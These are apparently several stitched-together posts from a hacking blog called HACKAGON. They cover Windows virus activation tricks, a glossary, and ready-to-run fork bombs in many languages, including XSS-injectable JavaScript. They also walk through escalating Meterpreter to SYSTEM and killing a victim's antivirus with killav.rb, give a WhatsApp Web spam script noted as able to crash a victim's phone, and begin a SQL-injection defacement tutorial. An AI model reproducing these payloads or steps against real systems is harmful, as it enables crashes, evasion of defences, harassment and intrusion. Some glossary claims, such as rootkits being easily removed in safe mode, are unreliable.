Yes as well as no because it’s all depends on the slave, it’s really hard to remove the infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace because PC usually got over 300 connections. So don’t worry.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding RAT – Remote Administration Tool.  so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


On contrary to popular belief, Hacker’s own machines are often more vulnerable to attacks than the average user. This is especially true of those who are new to the world of hacking because of their more frequent access to remote machines, dodgy forums, open administrative privileges on their own machines and inexperience in covering their tracks etc. Further, those who are experienced often take advantage of the ones who are in the learning stage, trying to get into this field. So, for a newbie hacker, it is of vital importance to learn how to protect themselves to avoid being consumed by their own curiosity by Understanding Computer Viruses.

In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise.

Understanding Computer Viruses

Understanding Computer Viruses

Computer Viruses are the malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be “infected”. Viruses are perhaps the oldest form of malicious software (Malware). They’ve been around for a long time and are still evolving and causing havoc all over the world. At first sight, they seem to be innocent looking executable files, but if opened, they can turn your world upside down in a second.

You need a basic arsenal of skills for securing the executables on your system and coping with viruses on your own. Here we discuss proactive methods you can use to defend yourself against malicious executable code in files, resources, component libraries, scripts and macros, as well as how to avoid a handful of other potential vulnerabilities.

Depending on the destructiveness power of the payload, Computer Viruses can result in a significant loss of data, time, and money. In the best scenario, you may just lose the time it takes to disinfect your computer. At worst, a mission-critical server may be reduced to little more than an expensive door-stop. Unfortunately, antivirus software isn’t perfect, and there’s always some lag between the emergence of a new electronic predator and the availability of virus definitions to protect against it. Moreover, many coders of today’s more diverse and sophisticated computer viruses are taking the preemptive step of disabling or even removing antivirus software as part of their operation.

I’m not suggesting that you shouldn’t rely on your antivirus programs for day-to-day virus protection, especially since antivirus programs are very good at keeping you safe but only from the known threats. However, if you’ve never had to fight a virus without your antivirus software, then it’s only a matter of time before you will. The main reason for this is newbie viruses. For an antivirus to be able to guard against newbie viruses, it must first be reported, the virus scanning code must be modified to include this newbie virus, and finally the virus database copy on the client side must be updated.

Because virus protection changes every day, those annoying notifications that your antivirus probably gives routinely are there to protect you. You must’ve noticed in the UPDATE menu of any antivirus an option to “Update Virus Database” or something like that. This is evidence of the ongoing war against viruses.

How do Viruses Works, In General ?

Well, first, the coder writes the executable codes required to carry out the virus’s activation process and then whatever nasty things it’s meant to do. What does the coder want from his virus to accomplish? Should it reformat your hard drive? Delete JPG files? Mail copies of itself to your friends and co-workers? Making any of this happen requires “executable” code of some kind.

Second, in order for this code to execute, the virus needs to be activated or opened. The usual way a virus’s executable code will run is the direct method: some unwary user receives an e-mail attachment called “Click-Here.exe” or something equally enticing. This runs the program and the virus is unleashed. As easily avoided as this result seems to be, it still works far more often than it should.

Virus coders have discovered a number of other, less obvious techniques for getting a virus to take over your computer. Below we take a look at some of these techniques, beginning with the question of what constitutes the executable code, then we’ll examine several sneaky activation methods. These activation methods are particularly important, as this is where you’ll understand how to completely unhook viruses from your system in order to regain control of it following an infection.

What Constitutes Executable Code ?

Of course, you know that .exe files are executable, as are other similar file formats such as .cmd and .com etc. There are many other file types that may contain executable code, and any executable code can be unsafe. In general, executable code falls into three broad categories:

  • Standalone Programs.
  • The code included within resources or libraries.
  • Script or macro code executed by an interpreter of some kind.

In a broad sense, a standalone program is pretty much any file type that relies on the operating system for it to execute. How do you know which ones these are? The answer lies in the Windows registry. To battle against viruses on their own turf, you’ll have to be very comfortable delving into the registry. So let’s take a look at how executable programs are invoked:

  1. Launch the Registry Editor by opening “Run” and type “regedit”.
  2. Expand the “HKEY_CLASSES_ROOT (HKCR)” node – It’s the operating system’s repository for information on file associations and commands and Under this HKCR, you’ll find nodes representing all the file type extensions registered on your computer.
  3. Navigate down the tree until you locate the key named “.exe”.
  4. Select this “.exe” node and observe that its default value (shown in the right-hand pane) is “exefile” – This is a pointer to another node under HKCR (the exefile key).
  5. Scroll down and find the “exefile” folder. The exefile key contains a Shell Subkey. This is where a file type’s available actions are defined. In OS terminology, these actions are known as “Verbs”. For example, a Microsoft Word document might have a “print” verb defined, which allows you to right-click the file in Windows and choose Print from the context menu.
  6. Expand the shell subkey for the “exefile” node to view the available verbs for EXE files. You’ll probably see two or three different subkeys, depending on your system. The one to be concerned with is “open”. (HCKR >> exefile >> shell >> open) Expand this node and select its command subkey. Each verb has its own subkey, and each of those keys, in turn, has its own command subkey. The default value in this subkey dictates exactly what happens when that verb is executed.

Double-clicking the file icon in Explorer has the same effect — it executes the default verb’s command (open for EXE files). As you can see, for EXE files, the open command verb has a value of %1 %* This is used in MS-DOS batch file language. The basic idea is that the path and filename of the EXE file you activated are substituted for the “%1” parameter while any switches or command-line parameters that go along with it are passed through the “%*” parameter. So it would stand to reason that any other file types whose open verb evaluates to some flavor of “%1” would tend to pose a risk. There is a number of these, and they’re all potentially dangerous. Considering that the virus coder knows that most people won’t double-click a file with a .exe extension or a .bat file, there are several other options including : .cmd, .com, .pif, .vbs – All of these file types have a default open verb of %1. A virus writer could simply change the .exe extension of his virus executable to, .com, and s/he probably just increased the chances that the unsuspecting masses will run it. Particularly dangerous is (was, actually) the humble Screen Saver file type (“.scr” extension). Close to the start of the 21st century, “.scr” viruses were literally everywhere. They were widely believed to be power-saving, which is so not true (Stand-by mode is much better). People thought it couldn’t hurt, right? so what’s the harm? So Naive. Again, extension hardly matters, everything a “.exe” virus can do, a “.scr” one can do equally as well. The days of “.scr” might be gone, but viruses are probably here to stay, Whatever the type, extension, purpose and payload – The core concepts are always the same. So, let’s take a deeper look at the working of “.scr” viruses. The key to the future lies in the past between the shadows.

In the Registry Editor, compare the open verb’s command default value for “EXE” and “SCR” files, respectively. As you will notice, they’re pretty much identical— “%1” %* for EXEs and “%1″/s for Screen Saver files. Screen savers are, as it turns out, standalone executables. The only difference between these two default verbs is a “/S” switch for the SCR file type. The intended purpose of the screen saver’s “open” verb is to allow for testing a screen saver, and the screen saver executable interprets the “/S” switch accordingly. There’s nothing to stop a virus writer from giving their application a “.scr” extension and then simply ignoring the “/S” switch passed to it when the user invokes the program. Exploiting the popularity of screen savers was even easier because the caption of the screen saver’s open verb is shown as “Test” in the right-click menu. A user thinks he’s just testing a screen saver, but what he’s actually doing is activating a virus. A particularly clever virus might even display an actual screen saver, pre-occupying you with pretty flowers while it destroys files on your hard drive in the background. This caption is stored in the default value for the open key itself. Meaning, just like you can simply find and change your “Recycle Bin’s” name to say “Dumpster” or “TrashCan”, you can also change the “Test” option to anything you like. On an unrelated note, you may also change the “Open” option for a word document to maybe “Do Belly Dance” or anything you like. Of course, this only changes the string and not what it does.(Try using the “CTRL + F”, find function to poke around and feel the power of “regedit”. Be warned, don’t change anything that you don’t know about. Changing text strings like “My Computer” is harmless, but changing some core functions code may wreck your computer before you can undo it.

Libraries Can Be Dangerous

Executable code can live inside resources or component libraries of many different varieties. These may not seem like obvious candidates for viruses, but they can certainly be exploited in that way. These file types include Dynamic Link Libraries (DLL), Control Panel Applets (CPL), various Type Libraries (TLB, OLB, and so on). This code isn’t directly executable with a “%1” command verb like .exe, but this doesn’t mean that the code can’t be run. Just about any function exported from a DLL can be invoked using a helper application called “RUNDLL32.exe”.

A virus could employ two possible attacks. One would be to replace an existing DLL with a compromised version, in which a particular function is replaced by one of the same name but with altered functionality. Then, whenever the system invokes this function, instead of having the desired result, the virus is activated instead. The second approach is simply to write a DLL from scratch and invoke its functions using RUNDLL32.EXE when needed. This isn’t quite as straightforward as invoking the code in an EXE file, but a DLL, OCX, TLB or another library file is more likely to be accepted by an unsuspecting user or to be overlooked by an antivirus program, so it may well be worth the greater effort on the virus coder’s part.

Scripts and Macros

Increased Flexibility Brings Increased Risk, Script code requires a script engine to interpret and run, but it can still be exploited. Scripts come in several forms, they may be used to perform a repetitive task, modify documents, pretty much everything that a “.exe” file can do. Microsoft has done a lot to tighten the security of these macros and scripts, but it’s still easy for a macro virus to do a lot of damage. A popular script category is Windows Script Host (WSH) files. These files, usually with .wsf, .js, or .vbs extensions, carry a default file association which causes them to be executed, no questions asked when users double-click them. As you might imagine, this can be disastrous.

Web applications may also carry dangerous scripts. Client-side scripts, for example, are fairly limited in their access to the host system for security reasons, but there’s a little-known file type, the HTML Application (with an HTA extension), which works like a client-side Web application without the same security restrictions. Its purpose is to allow developers to use their Web development skills to build rich applications using the Web browser metaphor. But again, the unsuspecting user can unleash all sorts of chaos by downloading and executing such a file without first examining its contents. All of these scripts and macros can be readily examined before they’re executed, but clearly an average user won’t bother reading some weird code.

Virus Activation Methods

The most common way for a virus to be activated is for a user to directly execute, say an e-mail attachment. Virus writers do just about anything to make you open the attachment using this action, but most developers are savvy enough not to just run an unknown executable. Of course, just about all of us have done it at one time or another—particularly now that viruses can access address books and can assemble a credible-looking e-mail message, ostensibly from someone you know and trust. Be that as it may, as users have become more aware, virus creators have gotten more devious, and there is now a host of new methods for activating a virus on a computer that doesn’t require any code to be explicitly executed (E-mail attachment viruses are a rare sight nowadays, since most email services themselves check emails for malicious files).

Registration Files

Files with an REG extension, are system registration files that hold information to be integrated into the system registry. The problem with them is that they carry a default verb of “open”. This means that if any registration file is double-clicked, it immediately dumps its contents directly into the system registry, without any confirmation required (depending on your OS). Since it has access to the registry, it is free to modify anything it pleases. It may delete vital keys required for the system to startup or even modify existing ones to make further file types vulnerable. Also, it may create a new entry for a previously unknown extension. A general antivirus may not recognize and hence ignore a file extension of for example “.bobo”. But in the registry, there could be an entry to make the file’s default action to “Open” or “Run” – giving it all the powers of a .exe file. This could be potentially devastating.

Luckily, most antivirus software nowadays is adopting the “Sandboxing” technique to run untested files. Basically, the antivirus gives the file a test run in a secure and sealed environment (sandbox) and checks if it tries to get out by, for example, trying to access something that it’s not supposed to or changing system settings and variables without asking the users explicitly. Inside the sandbox, it is denied anything remotely suspicious and the antivirus raises a big red flag and moves the file to the quarantine section (virus vault) or maybe even delete it straight away.

Path Vulnerabilities

Another hazard is something called the PATH Environment Variable. Anyone who uses a computer is bound to have used a “shortcut” file at least once. Whether it’s the “Google Chrome” icon on your desktop or maybe “WinZip” in your taskbar these shortcut files are simply links to the actual files stored in the folder in which they were installed. It’s clearly a little tedious to open “My Computer >> C: Drive >> Program Files >> Mozilla”. To open “Mozilla Firefox” every time. Hence, we have these shortcut files which simply stores the “Path” to the actual application. These files don’t exactly use the Path environment variable, but the concept is exactly the same.

The computer has certain files (example: explorer.exe) that it may routinely need to open (example: at startup). So, in the Registry, it has simply stored the name of the file it needs to open, and it’s path (in a path variable). Whenever the OS needs to open a particular system file it simply looks it up in the registry, follows the path in the memory and opens it. What does this have to do with viruses? With everything from phones to cars to houses getting smarter every moment, our computer viruses are not behind. It’s just a little too obvious and literally “on the nose” when a user clicks a file and his computer goes berserk. Once infected, our victim, although compromised is now a little wiser for he knows exactly where it went wrong. If the victim downloaded something from a website that caused damage to his system, s/he may report the website to the police. Clearly jail time is not so appealing to anyone, let alone virus programmers.

This brings us back to path vulnerabilities. Get this! The attacker needs to infect a system without making it too obvious. To do so, s/he needs a time gap between the actual infection and the attack so that it hits the victim out of the blue. We have two ways to do this by exploiting the path variable. Average users don’t really bother to sniff around system files like in the “Windows” folder (you may find this in your C: drive) and this much understandable carelessness can be exploited. The attacker can simply take two systems, one with Windows 7 and the other with XP and search for the location of (example) “winlogon.exe” – A file that is used by the OS to maintain a user session. (You may find this running in the task manager). Now in the virus file, the attacker can simply write up code to create two copies of the virus and send one to the path for Windows 7, and the other one to the path for Windows XP. (The path for the “winlogon.exe” file, which s/he searched earlier). After this, the virus can be coded to delete the file “winlogon.exe” and simply rename itself “winlogon.exe”. So, on the next startup when the OS looks up this file, it instead unleashes the virus and we’ve got BOOM. Total stealth, total annihilation and the victim have got no clue of what the hell just happened. The other way to do this is to code the virus to edit the path in the registry from its default value to where it (the virus) is stored. It can then rename itself and in this case on the next startup, the OS doesn’t even go to the actual file but instead to the virus and starts it up. Equally effective.

The Best Offense is a Strong Defense Understanding how viruses take hold is the first step in knowing how and where to untangle them from your system once it has been compromised. As viruses become more sophisticated, you can expect them to become more aggressive toward your antivirus software. So what can we do about these nefarious little beasties? We’ve come a long way. Even though the end is not in sight, the roads that lie ahead of us are shorter than the ones behind. Cyber Security today, is tighter than ever but that doesn’t mean we are immune to attacks. If you do have the latest antivirus software and keep your OS updated, you probably don’t need to worry about 99% of all the malicious software out there, but the remaining 1% is the reason why cyber security is a $100 billion market today. Successful attacks are rarer today than ten years ago, but they certainly make up for it in sheer intensity. More and more people each day are relying more and more on their computers, not knowing that simply entering their credit card information on a secure website could be sending all those details to a hacker. Attacks and infections are decreasing in number, but rising in destructiveness. Today, almost nobody bothers to spread around a virus that simply causes reboots or wipes data, since there’s no real gain for the hacker in it. The malicious software today are much more targeted. Clearly, obtaining someone’s social security number or bank pin is much more valuable to a hacker than deleting some random person’s movies and pictures.

The only thing we can do is keep our eyes open and turn around at the slightest hint of trouble. Avoid downloading from unconfirmed sources and make sure your antivirus software and OS is updated. Even if your system is compromised you may never actually know it, but the hacker could have identified that you are an easy target. If just once he could get valuable information from your system, it’s very likely that he will keep the system compromised, silently (make it a slave). Further, make sure to never ever store sensitive or financial information on your computer. Keeping it on an offline system or an external hard drive is much safer.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding Virology – Understanding Computer Viruses. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Think about, just 5 characters long virus equivalent of a Denial-Of-Service attack on any computer system. Which aims at depriving the system off its RAM, leaving none for vital functions required to keep the systems running, hence crashing it. Fork Bomb is not just deadly to a computer but it’s also annoying.

fork bomb

What Is Fork Bomb ??

Fork Bomb (aka Rabbit Virus or Wabbit) is a Denial-Of-Service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.

How About Virus Doubling Itself !!

Virus doubling itself is a form of exponential growth.

  1. After a single iteration of the loop, two viruses are created.
  2. After another cycle, each of those two creates another two for a total of four same virus.
  3. After 10 iterations we’ll have 2^10 = 1024 virus.
  4. After 100 iterations we have 2^100 = 1.267 Nonillion, that’s a number so big you don’t even know what ‘Nonillion’ is (It’s 10^30).

Even with today’s CPUs and RAMs, being in the Tera Range (THz and Tb), the virus will probably not even complete 50 iterations before running out of memory. Remember, every iteration would hardly take a few milliseconds, so running this virus will almost definitely crash your computer.

Concept Behind Fork Bomb

Creation of a function that calls itself twice every call and doesn’t have any way to terminate itself. It will keep doubling up until you run out of system resources.

Coding Fork Bomb In Different Programming Languages

1# Fork Bomb using the Bash shell:

:(){ :|:& };:

Where,
:() means you are defining a function called :
{:|: &} means run the function : and send its output to the : function again and run that in the background.
The ; is a command separator, like &&.
: runs the function the first time.

2# Encoding in a standalone shell script as opposed to a shell function:

#!/bin/bash

./$0|./$0& #”$0″ returns the name of the shell script itself

3# Fork Bomb using the Microsoft Windows batch language:

:s
start “” %0
goto s

The same as above, but shorter:
%0|%0

4# Fork Bomb using inline shell of Perl interpreter:

perl -e “fork while fork” &

5# Fork Bomb Using Python:

import os
while 1:
os.fork()

6# Fork Bomb Using Ruby:

loop { fork { load(__FILE__) } }

7# Fork Bomb using Haskell:

import Control.Monad (forever)
import System.Posix.Process (forkProcess)

forkBomb = forever $ forkProcess forkBomb

main = forkBomb

8# Fork Bomb using Common Lisp (Clozure CL):

(loop (#_fork))

9# Fork Bomb using C:

#include <unistd.h>

int main(void)
{
while(1) fork();
}

10# Fork Bomb using Assembly:

section .text
global_start

_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start

Fork Bomb In .NET using C#:
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}

11# Fork Bomb using VB.net:

Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True

12# Fork Bomb using JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>

Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:

<a href=”#” onload=”function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }”>XSS fork bomb</a>

Or, a more aggressive version:

<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>

Prevention

As a Fork Bomb’s mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.

  • On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit –u 30 would limit the affected user to a maximum of thirty owned processes.
  • On PAM (Pluggable Authentication Module) enabled systems, this limit can also be set in /etc/security/limits.conf
  • On FreeBSD, the system administrator can put limits in /etc/login.conf.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON provided knowledge about an amazing virus. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Humans should be defined by Laziness before Intelligence. So save your google-ing time with below-listed Terms Of Hacking World which will make you a cool HACKER.

Terms Of Hacking World

Terms Of Hacking World:

1# DDoS: DDoS (Distributed Denial of Service) is a type of DOS attack where multiple compromised systems, which are often infected with a Trojan, are used to target a single system causing a Denial of Service (DoS) attack.

2# VPS: A virtual private server (VPS) is a virtual machine sold as a service by an Internet hosting service. A VPS runs its own copy of an operating system, and customers have superuser-level access to that operating system instance, so they can install almost any software that runs on that OS.

3# SE: Social engineering is an attack vector that relies heavily on human interaction and often involves tricking people into breaking normal security procedures.

4# HTTP: The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text.

5# SSH: Secure Shell, or SSH, is a cryptographic (encrypted) network protocol operating at layer 7 of the OSI Model to allow remote login and other network services to operate securely over an unsecured network or in simple words Secure Shell, used to connect with Virtual Private Servers.

6# FTP: The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.

7# XSS (CSS): Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web pages viewed by other users.

8# Script Kiddie: A Script Kiddie or Skiddie (also known as skid and script bunny, the term script kitty is not valid in this context) is an unskilled individual who uses scripts or programs developed by others to attack computer systems and networks and deface websites.

9# VPN: A Virtual Private Network (VPN) extends a private network across a public network, such as the Internet. It enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network, and thus benefit from the functionality, security and management policies of the private network.

10# Nix: Nix is a powerful package manager for Linux and other Unix systems that make package management reliable and reproducible. It provides atomic upgrades and rollbacks, side-by-side installation of multiple versions of a package, multi-user package management and easy setup of build environments.

11# SQL: Structured Query Language is a special-purpose programming language designed for managing data held in a relational database management system (RDBMS), or for stream processing in a relational data stream management system (RDSMS).

12# FUD: Fully undetectable (usually shortened as FUD) can stand for data that had been encrypted, making it appear to be random noise. It can also stand for software that cannot be detected by anti-viruses when a scan is performed. The term is used in hacker circles to refer to something that appears to be clean to many anti-viruses, even though it is a hacking tool.

13# LOIC/HOIC: The Low/High Orbit Ion Cannon, often abbreviated to HOIC, is an open source network stress testing and denial-of-service attack application written in BASIC designed to attack as many as 256 URLs at the same time.

14# Trojan: A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users’ systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems.

15# Botnet: A botnet (also known as a zombie army) is a number of Internet computers that, although their owners are unaware of it, have been set up to forward transmissions (including spam or viruses) to other computers on the Internet.

16# SQL Injection: SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

17# Root: Highest permission level on a computer which allows the user to modify anything on the system without restriction.

18# Warez: Warez is copyrighted works distributed without fees or royalties, and may be traded, in general, violation of copyright law. Warez are generally unauthorized releases by organized groups, as opposed to file sharing between friends or large groups of people with similar interest using a darknet. Warez are not usually commercial software counterfeiting.

19# White Hat Hacker: A white hat hacker is a computer security specialist who breaks into protected systems and networks to test and assess their security. White hat hackers use their skills to improve security by exposing vulnerabilities before malicious hackers (known as black hat hackers) can detect and exploit them.

20# Black Hat Hacker: A black hat hacker is an individual with extensive computer knowledge whose purpose is to breach or bypass internet security. Black hat hackers are also known as crackers or dark-side hackers. The general view is that, while hackers build things, crackers break things.

21# Grey Hat Hacker: The term “Grey Hat” refers to a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but does not have the malicious intent typical of a black hat hacker.

22# Rootkit: A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence. The term rootkit is a connection of the two words “root” and “kit”. This kind of virus can be easily removed by booting the computer in safe mode.

23# Ring0: Very hard to remove and very rare in the wild, these can require you to format, it’s very hard to remove certain ring0 rootkits without safe mode.

24# IP Grabber: A link that grabs victim’s IP when they visit it.

25# Malware: ‘Malware’ is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, trojan horses, ransomware, spyware, adware, scareware, and other malicious programs. It can take the form of executable code, scripts, active content, and other software.

26# Phreak: Phreak is a slang term coined to describe the activity of a culture of people who study, experiment with, or explore, telecommunication systems, such as equipment and systems connected to public telephone networks. The term phreak is a sensational spelling of the word freak with the ph- from the phone, and may also refer to the use of various audio frequencies to manipulate a phone system. Phreak, phreaker, or phone phreak are names used for and by individuals who participate in phreaking.

27# DOX: Doxing or doxxing, is the Internet-based practice of researching and broadcasting personally identifiable information about an individual. The methods employed to acquire this information include searching publicly available databases and social media websites (like Facebook), hacking, and social engineering. It is closely related to internet vigilantism and hacktivism. Doxing may be carried out for various reasons, including to aid law enforcement, business analysis, extortion, coercion, harassment, online shaming and vigilante justice.

28# Worm: A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program.

29# Deface: A website deface is an attack on a site that changes the appearance of the site or a certain web page or technically when a hacker replaces the index file with their own one.

30# Keylogger: Keylogger is a computer program that records every keystroke made by a computer user, especially in order to gain fraudulent access to passwords and other confidential information

31# RAT: A remote administration tool (RAT) is a piece of software that allows a remote “operator” to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, “RAT” software is usually associated with criminal or malicious activity

So, HACKAGON hopes that we provided a lot of cool Terms Of Hacking World so that our readers can begin their Hacking career with cool ethics. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Anonymity is a very big issue for a Hacker to save his ass from the Authority/Victim. If a hacker can somehow get in a system under the antivirus’s nose it is very likely that S/he will get caught if the antivirus scans the system for malicious files and connections. Protecting oneself is more important than exploiting the victim. So Let’s learn to Disable Antivirus In Remote PC.

As Installing Antivirus Software on the computer is an excellent way to deter Hackers, Conversely, Disabling Antivirus Software is an excellent way to exploit a system without leaving any Footprint.

Disable Antivirus In Remote PC

Why To Disable Antivirus In Remote PC ??

Disabling Antivirus and Firewall in victim’s PC are the necessary tasks for any Hacker to take care of because the next time the system is scanned by the victim’s antivirus software, it’s likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.

Logic Behind Disabling Antivirus

Antivirus Software’s are designed in the way that nobody can shut it down by simply closing it from the tray icon or by it’s GUI. If you have an antivirus on your computer, try to close it from the tray icon or the GUI. You’ll see that it asks you to confirm your action. Now open up task manager and try to kill the antivirus process file (something like avg.exe), you’ll find that now no questions are asked and the antivirus process is killed instantly. That’s because the admin has more control over the system than the antivirus, which is exactly what we’ll use to carry out this hack.

How To Disable Antivirus In Remote PC ??

Meterpreter is the utility which gives us complete control over the system. We can send commands to install a keylogger, jump to other computers on the network, look through all the files and directories, start and close programs at our will and tons more. Here, we’ll focus on the commands to Disable Antivirus Protection.

Steps To Disable Antivirus In Remote PC

Step 1# Getting Started: First of all, we need to escalate our privileges. Usually, when we hook up a listener (Meterpreter) on the victim’s system, the listener have the same privileges as the user. Nowadays, By default, all the latest operating system’s are giving reduced privileges to the user to make sure that the user cannot tamper with important files/folders (like system32) and to add another layer of protection from Hackers. To carry out this hack we need admin (or sysadmin) privileges.

Meterpreter listener embedded

Remember! Writing this tutorial we assumed that you’ve already embedded a Meterpreter Listener on the victim’s computer.

Step 2# Get the user ID: Before attempting to increase our privileges, let’s check to see if we’re already the admin. so that we can get straight to the Hack.

Type: meterpreter > getuid

Now this should return the ID of the user currently logged in. Depending on the OS this statement gives different results but we’re looking for are the keywords like “admin”, “sysadmin”, “authority”, “system”. These are bound to be associated with an account with admin privileges. Chances are that we’ll get something else not similar to this so, in the next step, we’ll take care of that.

Step 3# Escalate Privileges: Metasploit and its Meterpreter make it simple to escalate privileges to the sysadmin.

Type: meterpreter > getsystem

Escalate Privileges

You’ll notice that Metasploit responds with something like “…got system (with technique 1)” if everything went as planned. There are multiple inbuilt functions that Metasploit uses to try to increase privileges when ‘getsystem’ command is sent. It simply tries out all of them to see which one works.

Step 4# Check That Are we Sysadmin: Now that Metasploit has told us that it has escalated our privileges to sysadmin, let’s make sure.

Type: meterpreter > getuid

Check That Are we Sysadmin

One of the most common returns to the getuid after this command is Server username: NT Authority\System and this is what we’re looking for ideally. But if you get any of the above keywords, that’s just fine as well.

Step 5# Kill The Antivirus: Now as we have the power of admin. Let’s kill the antivirus of the victim. And For that purpose, Metasploit has a Ruby script called killav.rb which looks for any antivirus process that is running to shuts them down. It works on almost all of the antiviruses so we can be reasonably sure that it’ll do the job. (If it doesn’t, we could alternatively look for running processes and try to kill them manually).

Type: meterpreter > run killav.rb

Kill The Antivirus

You should see an output like “Killing Antivirus…”

Killing Antivirus

We’re Done. . .The antivirus is taken care of and can no longer interfere with our further activities. Ideally, you want to make sure that you’re hidden before trying out any hacks.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that our readers will maintain their anonymity and stay safe. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


We know everybody is talking about WhatsApp Hacking nowadays. So here in HACKAGON, we came up with the Spamming idea by adding a JavaScript Code Snippet in the WhatsApp Web by which we can automate the number of messages to send on the respective chat of particular Friend/Group by using WhatsApp Spammer Code.

WhatsApp Spammer

What Is WhatsApp Spammer ??

In simple words we can say that by using WhatsApp Spammer JavaScript Code Snippet, We can send any number of messages to our any WhatsApp Contact/Group without taking the effort of writing and pressing the send button for a particular message again and again.

WhatsApp Spammer JavaScript Code Snippet

// for send function to select input
function dispatch(target, eventType, char) {
var evt = document.createEvent(“TextEvent”);   
evt.initTextEvent (eventType, true, true, window, char, 0, “en-US”);
target.focus();
target.dispatchEvent(evt);
}

// enters input and clicks button
function send(msg){
a=document.getElementsByClassName(‘input’)[1];
dispatch(a,”textInput”,msg);
document.getElementsByClassName(‘icon-send’)[0].click();
}

// For Loop to spam. Edit “i<500” to customize

for(i=0;i<500;i++)
    send(“Let Me Spam You ” +i);

Steps To Use Above Code For WhatsApp Spamming

  1. Open your WhatsApp Web.
  2. Open the respective chat of particular Friend/Group.
  3. Copy the above given code and paste it into your Notepad so that you can edit it for the number of message repetitions as you wish.
  4. Edit the For Loop in code and put the number of messages you want to send/repeat (Here I’ve used “i<500” so the receiver will receive 500 messages ) and you can also edit the message string as you wish.
  5. Now just right-click on the WhatsApp Web and opt for Inspect Element/Inspect or Simply hit the F12 button.
  6. Copy paste the edited code on the Console & hit Enter.
  7. Done!!

Go easy on the Number of Repetitions, As this might crash your Friend’s/Victim’s Phone & WhatsApp.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that we provided the best WhatsApp Hack to have fun with your friend’s. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


SQL Injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. So, Let’s Learn How To Deface Websites Using SQL Injection With HACKAGON.

last injection

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What Is Website Defacement ??

Website defacement is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, as other forms of vandalism, is also used to spread messages by politically motivated “Cyber Protesters” or “Hacktivists”.

Defacing a website simply means replacing the index.html file of a site by attacker’s own file. Now all the users who’ll open the website will see the page uploaded by the attacker.

Steps To Deface Websites Using SQL Injection:

1) Vulnerability Check:

To check a vulnerable website for SQL Injection, you need to find a page that looks like this –
http://www.website.com/news.php?id=1

Now to test if it’s vulnerable, we add a ‘ (quote) to the end of URL and that would look like –
http://www.website.com/news.php?id=1′

If the database is vulnerable, the page will spit out a MySQL error something similar to –
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”

And that means the Site is vulnerable to SQL injection but if the page loads as normal then the website is not vulnerable to SQL Injection.

2) Finding the number of columns: 

To find the number of columns in the database, we’ll use the statement ORDER BY which tells the database how to order the result. Well just incrementing the number until we get an error.

